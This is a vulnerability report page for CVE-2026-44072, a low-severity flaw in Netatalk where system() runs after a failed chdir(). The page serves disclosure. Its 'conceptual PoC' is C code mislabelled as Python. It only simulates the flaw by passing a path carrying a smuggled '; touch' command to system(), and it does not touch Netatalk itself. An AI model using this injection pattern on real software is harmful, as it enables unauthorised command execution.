Security Vulnerability Report
中文
CVE-2026-44072 CVSS 3.0 LOW

CVE-2026-44072

Published: 2026-05-21 08:16:23
Last Modified: 2026-05-21 15:20:19
Source: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

Description

Netatalk 2.2.1 through 4.4.2 calls system() after a failed chdir() without properly handling the error condition, which allows a local privileged user to execute unintended commands or cause a minor service disruption under specific conditions.

CVSS Details

CVSS Score
3.0
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Netatalk 2.2.1 - 4.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * Conceptual PoC for CVE-2026-44072 * This demonstrates the vulnerability where system() is called after chdir() fails. * Assumes the vulnerable code looks like: system(path) or system("error " + path). */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> int main() { // Scenario: Attacker controls the current directory or path argument // The vulnerable app tries to chdir to a path that includes shell metacharacters. // If chdir fails (e.g., due to permissions or non-existence), it calls system(path). char *malicious_path = "; touch /tmp/poc_2026_44072"; // Command to execute printf("Attempting to trigger vulnerable logic...\n"); // Simulate the vulnerable logic if (chdir(malicious_path) != 0) { // Vulnerability: Calling system() on untrusted input // In real Netatalk, this might be logging or cleanup logic. printf("chdir failed, executing system() call as per vulnerable code flow.\n"); system(malicious_path); } return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44072", "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "published": "2026-05-21T08:16:22.807", "lastModified": "2026-05-21T15:20:19.040", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netatalk 2.2.1 through 4.4.2 calls system() after a failed chdir() without properly handling the error condition, which allows a local privileged user to execute unintended commands or cause a minor service disruption under specific conditions."}], "metrics": {"cvssMetricV31": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:L", "baseScore": 3.0, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://netatalk.io/security/CVE-2026-44072", "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.